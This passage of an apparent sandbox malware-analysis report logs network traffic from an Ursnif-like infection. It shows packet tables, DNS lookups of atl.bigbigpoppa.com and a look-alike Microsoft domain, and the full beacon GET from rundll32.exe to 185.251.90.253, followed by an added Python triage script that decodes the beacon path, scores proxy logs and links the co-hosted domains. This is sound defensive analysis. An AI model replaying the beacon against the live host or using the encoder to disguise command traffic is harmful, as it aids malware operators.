                                                        Sep 10, 2021 09:57:03.347079992 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347137928 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347184896 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347203016 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.347237110 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347271919 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347281933 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.347311020 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347337008 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347349882 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.347378969 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347405910 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347419024 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.347448111 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347472906 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347507000 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347522020 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.347557068 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347583055 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.347604990 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347636938 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347662926 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.347678900 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347704887 CEST8049788185.251.90.253192.168.2.5
Sep 10, 2021 09:57:03.347733021 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.347758055 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.347778082 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.347807884 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.347846985 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.347856045 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.347892046 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.347928047 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.347937107 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.347965956 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.347991943 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.348018885 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.348035097 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.348059893 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.348087072 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.348114967 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.348129988 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.348154068 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.348181963 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.348195076 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.348222971 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.348249912 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.348284006 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.348304033 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.348334074 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.348365068 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.348378897 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.348407984 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.348434925 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.348453045 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.348476887 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.348510027 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.348517895 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.348546028 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.348582029 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.348700047 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.397670031 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.397727013 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.397754908 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.397793055 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.397829056 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.397876978 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.397907019 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.397958994 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.398005009 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.398015976 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.398055077 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.398098946 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.398147106 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.398163080 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.398201942 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.398245096 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.398258924 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.398308039 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.398327112 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.398375034 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.398413897 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.398442984 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.398493052 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.398530960 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.398557901 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.398602009 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.398643017 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.398663998 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.398709059 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.398749113 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.398788929 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.398808956 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.398847103 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.398869991 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.398916006 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.398956060 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.398987055 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.399034977 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.399079084 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.399106026 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.399172068 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.399224043 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.399285078 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.399341106 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.399385929 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.399410963 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.399461031 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.399509907 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.399532080 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.399584055 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.399619102 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.399652958 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.399703979 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.399754047 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.399787903 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.399821997 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.399869919 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.399892092 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.399947882 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.399980068 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.400023937 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.400079012 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.400114059 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.400156021 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.400214911 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.400237083 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.400295019 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.400346994 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.400367022 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.400418043 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.400466919 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.400484085 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.449502945 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.449529886 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.449547052 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.449563980 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.449580908 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.449600935 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.449615955 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.449636936 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.449656963 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.449681997 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.449704885 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.449724913 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.449752092 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.449760914 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.449788094 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.449807882 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.449826956 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.449846983 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.449866056 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.449889898 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.449914932 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.449920893 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.450015068 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.451030016 CEST | 49788 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.499962091 CEST | 80 | 49788 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.753268003 CEST | 49789 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.802388906 CEST | 80 | 49789 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:03.802563906 CEST | 49789 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.803296089 CEST | 49789 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:03.895859003 CEST | 80 | 49789 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:04.265120983 CEST | 80 | 49789 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:04.265170097 CEST | 80 | 49789 | 185.251.90.253 | 192.168.2.5
Sep 10, 2021 09:57:04.265221119 CEST | 49789 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:04.265330076 CEST | 49789 | 80 | 192.168.2.5 | 185.251.90.253
Sep 10, 2021 09:57:04.314174891 CEST | 80 | 49789 | 185.251.90.253 | 192.168.2.5

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 10, 2021 09:54:16.495672941 CEST | 61805 | 53 | 192.168.2.5 | 8.8.8.8
Sep 10, 2021 09:54:16.525423050 CEST | 53 | 61805 | 8.8.8.8 | 192.168.2.5
Sep 10, 2021 09:54:17.735285997 CEST | 54795 | 53 | 192.168.2.5 | 8.8.8.8
Sep 10, 2021 09:54:17.774296999 CEST | 53 | 54795 | 8.8.8.8 | 192.168.2.5
Sep 10, 2021 09:54:24.310771942 CEST | 49557 | 53 | 192.168.2.5 | 8.8.8.8
Sep 10, 2021 09:54:24.364779949 CEST | 53 | 49557 | 8.8.8.8 | 192.168.2.5
Sep 10, 2021 09:54:37.129802942 CEST | 61733 | 53 | 192.168.2.5 | 8.8.8.8
Sep 10, 2021 09:54:37.174592018 CEST | 53 | 61733 | 8.8.8.8 | 192.168.2.5
Sep 10, 2021 09:55:00.952759981 CEST | 65447 | 53 | 192.168.2.5 | 8.8.8.8
Sep 10, 2021 09:55:00.999222994 CEST | 53 | 65447 | 8.8.8.8 | 192.168.2.5
Sep 10, 2021 09:55:07.246059895 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8
Sep 10, 2021 09:55:07.283293009 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5
Sep 10, 2021 09:55:36.868942976 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8
Sep 10, 2021 09:55:36.920532942 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5
Sep 10, 2021 09:55:38.634845972 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Sep 10, 2021 09:55:38.680517912 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Sep 10, 2021 09:56:37.302378893 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8
Sep 10, 2021 09:56:37.372829914 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5
Sep 10, 2021 09:56:38.174312115 CEST | 63183 | 53 | 192.168.2.5 | 8.8.8.8
Sep 10, 2021 09:56:38.208437920 CEST | 53 | 63183 | 8.8.8.8 | 192.168.2.5
Sep 10, 2021 09:56:39.009015083 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8
Sep 10, 2021 09:56:39.095431089 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5
Sep 10, 2021 09:56:39.535094023 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8
Sep 10, 2021 09:56:39.569369078 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5
Sep 10, 2021 09:56:40.187892914 CEST | 55161 | 53 | 192.168.2.5 | 8.8.8.8
Sep 10, 2021 09:56:40.213875055 CEST | 53 | 55161 | 8.8.8.8 | 192.168.2.5
Sep 10, 2021 09:56:40.685719013 CEST | 54757 | 53 | 192.168.2.5 | 8.8.8.8
Sep 10, 2021 09:56:40.737162113 CEST | 53 | 54757 | 8.8.8.8 | 192.168.2.5
Sep 10, 2021 09:56:41.651288986 CEST | 49992 | 53 | 192.168.2.5 | 8.8.8.8
Sep 10, 2021 09:56:41.679358959 CEST | 53 | 49992 | 8.8.8.8 | 192.168.2.5
Sep 10, 2021 09:56:42.441236019 CEST | 60075 | 53 | 192.168.2.5 | 8.8.8.8
Sep 10, 2021 09:56:42.471427917 CEST | 53 | 60075 | 8.8.8.8 | 192.168.2.5
Sep 10, 2021 09:56:43.250380993 CEST | 55016 | 53 | 192.168.2.5 | 8.8.8.8
Sep 10, 2021 09:56:43.303951979 CEST | 53 | 55016 | 8.8.8.8 | 192.168.2.5
Sep 10, 2021 09:56:43.879877090 CEST | 64345 | 53 | 192.168.2.5 | 8.8.8.8
Sep 10, 2021 09:56:43.915908098 CEST | 53 | 64345 | 8.8.8.8 | 192.168.2.5
Sep 10, 2021 09:57:00.992954969 CEST | 57128 | 53 | 192.168.2.5 | 8.8.8.8
Sep 10, 2021 09:57:01.324281931 CEST | 53 | 57128 | 8.8.8.8 | 192.168.2.5
Sep 10, 2021 09:57:02.308634996 CEST | 54791 | 53 | 192.168.2.5 | 8.8.8.8
Sep 10, 2021 09:57:02.645363092 CEST | 53 | 54791 | 8.8.8.8 | 192.168.2.5
Sep 10, 2021 09:57:03.698268890 CEST | 50463 | 53 | 192.168.2.5 | 8.8.8.8
Sep 10, 2021 09:57:03.735027075 CEST | 53 | 50463 | 8.8.8.8 | 192.168.2.5
Sep 10, 2021 09:58:07.014339924 CEST | 50394 | 53 | 192.168.2.5 | 8.8.8.8
Sep 10, 2021 09:58:07.042078018 CEST | 53 | 50394 | 8.8.8.8 | 192.168.2.5
Sep 10, 2021 09:58:07.188774109 CEST | 58530 | 53 | 192.168.2.5 | 8.8.8.8
Sep 10, 2021 09:58:07.511419058 CEST | 53 | 58530 | 8.8.8.8 | 192.168.2.5

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 10, 2021 09:57:00.992954969 CEST | 192.168.2.5 | 8.8.8.8 | 0x805e | Standard query (0) | atl.bigbigpoppa.com | A (IP address) | IN (0x0001)
Sep 10, 2021 09:57:02.308634996 CEST | 192.168.2.5 | 8.8.8.8 | 0xffa7 | Standard query (0) | atl.bigbigpoppa.com | A (IP address) | IN (0x0001)
Sep 10, 2021 09:57:03.698268890 CEST | 192.168.2.5 | 8.8.8.8 | 0x742d | Standard query (0) | atl.bigbigpoppa.com | A (IP address) | IN (0x0001)
Sep 10, 2021 09:58:07.014339924 CEST | 192.168.2.5 | 8.8.8.8 | 0xcc35 | Standard query (0) | resolver1.opendns.com | A (IP address) | IN (0x0001)
Sep 10, 2021 09:58:07.188774109 CEST | 192.168.2.5 | 8.8.8.8 | 0xde2a | Standard query (0) | art.microsoftsofymicrosoftsoft.at | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 10, 2021 09:57:01.324281931 CEST | 8.8.8.8 | 192.168.2.5 | 0x805e | No error (0) | atl.bigbigpoppa.com | - | 185.251.90.253 | A (IP address) | IN (0x0001)
Sep 10, 2021 09:57:02.645363092 CEST | 8.8.8.8 | 192.168.2.5 | 0xffa7 | No error (0) | atl.bigbigpoppa.com | - | 185.251.90.253 | A (IP address) | IN (0x0001)
Sep 10, 2021 09:57:03.735027075 CEST | 8.8.8.8 | 192.168.2.5 | 0x742d | No error (0) | atl.bigbigpoppa.com | - | 185.251.90.253 | A (IP address) | IN (0x0001)
Sep 10, 2021 09:58:07.042078018 CEST | 8.8.8.8 | 192.168.2.5 | 0xcc35 | No error (0) | resolver1.opendns.com | - | 208.67.222.222 | A (IP address) | IN (0x0001)
Sep 10, 2021 09:58:07.511419058 CEST | 8.8.8.8 | 192.168.2.5 | 0xde2a | No error (0) | art.microsoftsofymicrosoftsoft.at | - | 185.251.90.253 | A (IP address) | IN (0x0001)
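
The DNS answers above and the GET request to atl.bigbigpoppa.com in the HTTP Packets section below are the indicators a responder would pivot on: two of the three queried names resolve to the same address, and the request path is a long run of opaque segments containing "_2F" and "_2B" tokens, one of them split across a slash. The Python below is an added example and is not part of the Joe Sandbox report. It treats the path as the Ursnif/ISFB URL scheme (an assumption: base64 with "/", "+" and "=" rewritten as "_2F", "_2B" and "_0A", then slashes inserted at random; the report itself only shows the first two tokens), recovers the blob the path carries and its length, scores a path for that shape so the same check can run over proxy logs, and groups the report's DNS answers by address to surface the co-hosted domain. The "_0A" token, the encoder's fixed slash spacing and the score thresholds are this example's assumptions; the recovered bytes remain ciphertext and are not decrypted.

```python
"""Triage of the network indicators recorded in this report.

Added example, not part of the Joe Sandbox report. Assumptions the report
does not state: the GET path is treated as the Ursnif/ISFB URL scheme
(base64 with '/', '+', '=' rewritten as _2F, _2B, _0A, then extra '/'
inserted); the recovered bytes are still ciphertext and are not decrypted
here. IOC strings are copied from the DNS Answers and HTTP Packets sections.
"""
import base64
import binascii
import re
from collections import defaultdict
from typing import Dict, List, Optional

# Request path copied verbatim from the GET in the HTTP Packets section.
REQUEST_PATH = (
    "/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/"
    "KwQmwxa6PANLq/HMQB1nMh/Dw7iIk4wPDbFz5MpJKzoM6O/xJlNu7xTm_/"
    "2BJVkAx380cQPl1qK/3MJgDX4sXjAo/UjQmGmv6_2B/EYaPNSI604XL9z/"
    "GGit9THH2wZWixIY_2BGE/_2Ftywp1kQkPvPY6/vEmMzODz0Ya_2Fy/"
    "CBZtOZch7qD9e_2FA3/3G0B8QjO4/zLpP4zwh3X5MwZp6F5E2/r2m_2Fmc2A2sWLpGKPD/"
    "1LL4BJlsYqHKw2i3OPm1CI/3lMhUc9ldfLAb/BfOzMYbz/ndeDEqMw"
)
# DNS answers copied from this report (name -> resolved address).
DNS_ANSWERS = {
    "atl.bigbigpoppa.com": "185.251.90.253",
    "resolver1.opendns.com": "208.67.222.222",
    "art.microsoftsofymicrosoftsoft.at": "185.251.90.253",
}
# Escape tokens of the assumed scheme: _2F and _2B appear in the report's
# path, _0A (for '=') is taken from the documented scheme only.
TOKENS = (("/", "_2F"), ("+", "_2B"), ("=", "_0A"))
_B64_STRICT = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def normalize_isfb_path(path: str) -> str:
    """Drop every '/', then map tokens back to base64 symbols. Slashes go
    first: the report's path has a token split by one ('...xTm_/2BJVk...')."""
    compact = path.replace("/", "")
    for symbol, token in TOKENS:
        compact = compact.replace(token, symbol)
    return compact


def decode_isfb_path(path: str) -> Optional[bytes]:
    """Return the encrypted blob carried in the path, or None when the path
    does not normalize to strict base64 (then treat it as an ordinary URL)."""
    b64 = normalize_isfb_path(path)
    if len(b64) % 4 != 0 or not _B64_STRICT.match(b64):
        return None
    try:
        return base64.b64decode(b64, validate=True)
    except binascii.Error:
        return None


def encode_isfb_path(blob: bytes, every: int = 7) -> str:
    """Forward direction, used to round-trip test the decoder: base64, escape
    the symbols, insert '/' every `every` chars (the bot randomizes the
    positions; fixed spacing is this example's simplification)."""
    b64 = base64.b64encode(blob).decode("ascii")
    for symbol, token in TOKENS:
        b64 = b64.replace(symbol, token)
    return "/" + "/".join(b64[i:i + every] for i in range(0, len(b64), every))


def isfb_path_score(path: str) -> int:
    """Hunting heuristic for proxy logs: count the traits the report's request
    shows. Thresholds are this example's choice, not the report's."""
    segments = [s for s in path.split("/") if s]
    score = 0
    if len(segments) >= 8:                          # many opaque segments
        score += 1
    if any(token in path for _, token in TOKENS):   # escape tokens present
        score += 1
    if not re.search(r"\.\w{1,5}$", path):          # no file extension
        score += 1
    if decode_isfb_path(path) is not None:          # normalizes to base64
        score += 2
    return score


def co_hosted_domains(answers: Dict[str, str]) -> Dict[str, List[str]]:
    """Group resolved names by address; two names on one address is the pivot
    from the first C2 host to the rest of the infrastructure."""
    by_addr: Dict[str, List[str]] = defaultdict(list)
    for name, addr in answers.items():
        by_addr[addr].append(name)
    return {a: sorted(n) for a, n in by_addr.items() if len(n) > 1}


if __name__ == "__main__":
    blob = decode_isfb_path(REQUEST_PATH)
    print("blob bytes:", None if blob is None else len(blob))
    print("path score:", isfb_path_score(REQUEST_PATH))
    print("co-hosted:", co_hosted_domains(DNS_ANSWERS))
```

Run as a script it prints the blob length, the path score and the co-hosted names. For hunting, feed isfb_path_score the path column of a proxy log and review anything scoring 4 or more, then compare the requesting process against the User-Agent: the session table below attributes this request to C:\Windows\SysWOW64\rundll32.exe while the header claims Firefox 90, a mismatch that no legitimate browser traffic produces.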

HTTP Request Dependency Graph

• atl.bigbigpoppa.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49787 | 185.251.90.253 | 80 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
Sep 10, 2021 09:57:01.419950962 CEST | 5849 | OUT | GET /KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PANLq/HMQB1nMh/Dw7iIk4wPDbFz5MpJKzoM6O/xJlNu7xTm_/2BJVkAx380cQPl1qK/3MJgDX4sXjAo/UjQmGmv6_2B/EYaPNSI604XL9z/GGit9THH2wZWixIY_2BGE/_2Ftywp1kQkPvPY6/vEmMzODz0Ya_2Fy/CBZtOZch7qD9e_2FA3/3G0B8QjO4/zLpP4zwh3X5MwZp6F5E2/r2m_2Fmc2A2sWLpGKPD/1LL4BJlsYqHKw2i3OPm1CI/3lMhUc9ldfLAb/BfOzMYbz/ndeDEqMw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
Host: atl.bigbigpoppa.com
